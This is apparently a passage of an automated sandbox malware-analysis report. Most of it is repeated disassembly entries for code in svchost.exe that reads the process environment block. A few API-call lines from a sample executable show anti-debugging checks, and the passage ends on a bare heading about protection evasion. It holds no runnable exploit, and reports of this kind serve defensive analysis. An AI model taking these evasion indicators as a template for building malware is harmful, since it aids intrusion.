Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030551EF mov eax, dword ptr fs:[00000030h]2_2_030551EF
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030351ED mov eax, dword ptr fs:[00000030h]2_2_030351ED
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D71F9 mov esi, dword ptr fs:[00000030h]2_2_030D71F9
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031061E5 mov eax, dword ptr fs:[00000030h]2_2_031061E5
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030601F8 mov eax, dword ptr fs:[00000030h]2_2_030601F8
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4000 mov ecx, dword ptr fs:[00000030h]2_2_030B4000
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A020 mov eax, dword ptr fs:[00000030h]2_2_0302A020
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C020 mov eax, dword ptr fs:[00000030h]2_2_0302C020
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F903E mov eax, dword ptr fs:[00000030h]2_2_030F903E
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F903E mov eax, dword ptr fs:[00000030h]2_2_030F903E
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F903E mov eax, dword ptr fs:[00000030h]2_2_030F903E
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F903E mov eax, dword ptr fs:[00000030h]2_2_030F903E
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032050 mov eax, dword ptr fs:[00000030h]2_2_03032050
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D705E mov ebx, dword ptr fs:[00000030h]2_2_030D705E
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D705E mov eax, dword ptr fs:[00000030h]2_2_030D705E
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B052 mov eax, dword ptr fs:[00000030h]2_2_0305B052
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6050 mov eax, dword ptr fs:[00000030h]2_2_030B6050
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B106E mov eax, dword ptr fs:[00000030h]2_2_030B106E
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03105060 mov eax, dword ptr fs:[00000030h]2_2_03105060
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov eax, dword ptr fs:[00000030h]2_2_03041070
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov ecx, dword ptr fs:[00000030h]2_2_03041070
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov eax, dword ptr fs:[00000030h]2_2_03041070
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov eax, dword ptr fs:[00000030h]2_2_03041070
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov eax, dword ptr fs:[00000030h]2_2_03041070
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov eax, dword ptr fs:[00000030h]2_2_03041070
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov eax, dword ptr fs:[00000030h]2_2_03041070
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov eax, dword ptr fs:[00000030h]2_2_03041070
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov eax, dword ptr fs:[00000030h]2_2_03041070
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov eax, dword ptr fs:[00000030h]2_2_03041070
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov eax, dword ptr fs:[00000030h]2_2_03041070
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov eax, dword ptr fs:[00000030h]2_2_03041070
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov eax, dword ptr fs:[00000030h]2_2_03041070
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305C073 mov eax, dword ptr fs:[00000030h]2_2_0305C073
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AD070 mov ecx, dword ptr fs:[00000030h]2_2_030AD070
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303208A mov eax, dword ptr fs:[00000030h]2_2_0303208A
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BD080 mov eax, dword ptr fs:[00000030h]2_2_030BD080
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BD080 mov eax, dword ptr fs:[00000030h]2_2_030BD080
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302D08D mov eax, dword ptr fs:[00000030h]2_2_0302D08D
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03035096 mov eax, dword ptr fs:[00000030h]2_2_03035096
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305D090 mov eax, dword ptr fs:[00000030h]2_2_0305D090
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305D090 mov eax, dword ptr fs:[00000030h]2_2_0305D090
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306909C mov eax, dword ptr fs:[00000030h]2_2_0306909C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C80A8 mov eax, dword ptr fs:[00000030h]2_2_030C80A8
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov eax, dword ptr fs:[00000030h]2_2_030F60B8
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov ecx, dword ptr fs:[00000030h]2_2_030F60B8
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov ecx, dword ptr fs:[00000030h]2_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov ecx, dword ptr fs:[00000030h]2_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov ecx, dword ptr fs:[00000030h]2_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov ecx, dword ptr fs:[00000030h]2_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031050D9 mov eax, dword ptr fs:[00000030h]2_2_031050D9
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AD0C0 mov eax, dword ptr fs:[00000030h]2_2_030AD0C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AD0C0 mov eax, dword ptr fs:[00000030h]2_2_030AD0C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B20DE mov eax, dword ptr fs:[00000030h]2_2_030B20DE
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030590DB mov eax, dword ptr fs:[00000030h]2_2_030590DB
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030550E4 mov eax, dword ptr fs:[00000030h]2_2_030550E4
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030550E4 mov ecx, dword ptr fs:[00000030h]2_2_030550E4
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0302A0E3
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030380E9 mov eax, dword ptr fs:[00000030h]2_2_030380E9
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B60E0 mov eax, dword ptr fs:[00000030h]2_2_030B60E0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C0F0 mov eax, dword ptr fs:[00000030h]2_2_0302C0F0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030720F0 mov ecx, dword ptr fs:[00000030h]2_2_030720F0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03037703 mov eax, dword ptr fs:[00000030h]2_2_03037703
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03035702 mov eax, dword ptr fs:[00000030h]2_2_03035702
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03035702 mov eax, dword ptr fs:[00000030h]2_2_03035702
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C700 mov eax, dword ptr fs:[00000030h]2_2_0306C700
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030710 mov eax, dword ptr fs:[00000030h]2_2_03030710
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060710 mov eax, dword ptr fs:[00000030h]2_2_03060710
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306F71F mov eax, dword ptr fs:[00000030h]2_2_0306F71F
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306F71F mov eax, dword ptr fs:[00000030h]2_2_0306F71F
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EF72E mov eax, dword ptr fs:[00000030h]2_2_030EF72E
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03033720 mov eax, dword ptr fs:[00000030h]2_2_03033720
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304F720 mov eax, dword ptr fs:[00000030h]2_2_0304F720
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304F720 mov eax, dword ptr fs:[00000030h]2_2_0304F720
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304F720 mov eax, dword ptr fs:[00000030h]2_2_0304F720
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F972B mov eax, dword ptr fs:[00000030h]2_2_030F972B
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310B73C mov eax, dword ptr fs:[00000030h]2_2_0310B73C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310B73C mov eax, dword ptr fs:[00000030h]2_2_0310B73C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310B73C mov eax, dword ptr fs:[00000030h]2_2_0310B73C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310B73C mov eax, dword ptr fs:[00000030h]2_2_0310B73C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03029730 mov eax, dword ptr fs:[00000030h]2_2_03029730
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03029730 mov eax, dword ptr fs:[00000030h]2_2_03029730
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03065734 mov eax, dword ptr fs:[00000030h]2_2_03065734
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303973A mov eax, dword ptr fs:[00000030h]2_2_0303973A
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303973A mov eax, dword ptr fs:[00000030h]2_2_0303973A
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov ecx, dword ptr fs:[00000030h]2_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AC730 mov eax, dword ptr fs:[00000030h]2_2_030AC730
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03043740 mov eax, dword ptr fs:[00000030h]2_2_03043740
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03043740 mov eax, dword ptr fs:[00000030h]2_2_03043740
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03043740 mov eax, dword ptr fs:[00000030h]2_2_03043740
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov esi, dword ptr fs:[00000030h]2_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030750 mov eax, dword ptr fs:[00000030h]2_2_03030750
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE75D mov eax, dword ptr fs:[00000030h]2_2_030BE75D
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03103749 mov eax, dword ptr fs:[00000030h]2_2_03103749
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4755 mov eax, dword ptr fs:[00000030h]2_2_030B4755
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302B765 mov eax, dword ptr fs:[00000030h]2_2_0302B765
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302B765 mov eax, dword ptr fs:[00000030h]2_2_0302B765
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302B765 mov eax, dword ptr fs:[00000030h]2_2_0302B765
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302B765 mov eax, dword ptr fs:[00000030h]2_2_0302B765
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038770 mov eax, dword ptr fs:[00000030h]2_2_03038770
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EF78A mov eax, dword ptr fs:[00000030h]2_2_030EF78A
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B97A9 mov eax, dword ptr fs:[00000030h]2_2_030B97A9
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BF7AF mov eax, dword ptr fs:[00000030h]2_2_030BF7AF
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BF7AF mov eax, dword ptr fs:[00000030h]2_2_030BF7AF
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BF7AF mov eax, dword ptr fs:[00000030h]2_2_030BF7AF
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BF7AF mov eax, dword ptr fs:[00000030h]2_2_030BF7AF
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BF7AF mov eax, dword ptr fs:[00000030h]2_2_030BF7AF
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031037B6 mov eax, dword ptr fs:[00000030h]2_2_031037B6
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030307AF mov eax, dword ptr fs:[00000030h]2_2_030307AF
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305D7B0 mov eax, dword ptr fs:[00000030h]2_2_0305D7B0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F7BA mov eax, dword ptr fs:[00000030h]2_2_0302F7BA
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F7BA mov eax, dword ptr fs:[00000030h]2_2_0302F7BA
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F7BA mov eax, dword ptr fs:[00000030h]2_2_0302F7BA
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F7BA mov eax, dword ptr fs:[00000030h]2_2_0302F7BA
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F7BA mov eax, dword ptr fs:[00000030h]2_2_0302F7BA
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F7BA mov eax, dword ptr fs:[00000030h]2_2_0302F7BA
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F7BA mov eax, dword ptr fs:[00000030h]2_2_0302F7BA
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F7BA mov eax, dword ptr fs:[00000030h]2_2_0302F7BA
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F7BA mov eax, dword ptr fs:[00000030h]2_2_0302F7BA
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303C7C0 mov eax, dword ptr fs:[00000030h]2_2_0303C7C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030357C0 mov eax, dword ptr fs:[00000030h]2_2_030357C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030357C0 mov eax, dword ptr fs:[00000030h]2_2_030357C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030357C0 mov eax, dword ptr fs:[00000030h]2_2_030357C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B07C3 mov eax, dword ptr fs:[00000030h]2_2_030B07C3
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303D7E0 mov ecx, dword ptr fs:[00000030h]2_2_0303D7E0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE7E1 mov eax, dword ptr fs:[00000030h]2_2_030BE7E1
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03061607 mov eax, dword ptr fs:[00000030h]2_2_03061607
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE609 mov eax, dword ptr fs:[00000030h]2_2_030AE609
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306F603 mov eax, dword ptr fs:[00000030h]2_2_0306F603
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03033616 mov eax, dword ptr fs:[00000030h]2_2_03033616
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03033616 mov eax, dword ptr fs:[00000030h]2_2_03033616
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072619 mov eax, dword ptr fs:[00000030h]2_2_03072619
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E627 mov eax, dword ptr fs:[00000030h]2_2_0304E627
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F626 mov eax, dword ptr fs:[00000030h]2_2_0302F626
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F626 mov eax, dword ptr fs:[00000030h]2_2_0302F626
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F626 mov eax, dword ptr fs:[00000030h]2_2_0302F626
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F626 mov eax, dword ptr fs:[00000030h]2_2_0302F626
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F626 mov eax, dword ptr fs:[00000030h]2_2_0302F626
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F626 mov eax, dword ptr fs:[00000030h]2_2_0302F626
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F626 mov eax, dword ptr fs:[00000030h]2_2_0302F626
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F626 mov eax, dword ptr fs:[00000030h]2_2_0302F626
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F626 mov eax, dword ptr fs:[00000030h]2_2_0302F626
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03066620 mov eax, dword ptr fs:[00000030h]2_2_03066620
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03105636 mov eax, dword ptr fs:[00000030h]2_2_03105636
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068620 mov eax, dword ptr fs:[00000030h]2_2_03068620
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303262C mov eax, dword ptr fs:[00000030h]2_2_0303262C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304C640 mov eax, dword ptr fs:[00000030h]2_2_0304C640
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03069660 mov eax, dword ptr fs:[00000030h]2_2_03069660
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03069660 mov eax, dword ptr fs:[00000030h]2_2_03069660
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03062674 mov eax, dword ptr fs:[00000030h]2_2_03062674
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B368C mov eax, dword ptr fs:[00000030h]2_2_030B368C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B368C mov eax, dword ptr fs:[00000030h]2_2_030B368C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B368C mov eax, dword ptr fs:[00000030h]2_2_030B368C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B368C mov eax, dword ptr fs:[00000030h]2_2_030B368C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]2_2_03034690
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]2_2_03034690
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C6A6 mov eax, dword ptr fs:[00000030h]2_2_0306C6A6
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302D6AA mov eax, dword ptr fs:[00000030h]2_2_0302D6AA
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302D6AA mov eax, dword ptr fs:[00000030h]2_2_0302D6AA
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030276B2 mov eax, dword ptr fs:[00000030h]2_2_030276B2
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030276B2 mov eax, dword ptr fs:[00000030h]2_2_030276B2
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030276B2 mov eax, dword ptr fs:[00000030h]2_2_030276B2
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030666B0 mov eax, dword ptr fs:[00000030h]2_2_030666B0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0306A6C7
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A6C7 mov eax, dword ptr fs:[00000030h]2_2_0306A6C7
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303B6C0 mov eax, dword ptr fs:[00000030h]2_2_0303B6C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303B6C0 mov eax, dword ptr fs:[00000030h]2_2_0303B6C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303B6C0 mov eax, dword ptr fs:[00000030h]2_2_0303B6C0
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_00426DA1 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_00426DA1
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_0042202E SetUnhandledExceptionFilter,0_2_0042202E
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004230F5
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00417D93
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00421FA7

HIPS / PFW / Operating System Protection Evasion

barindex
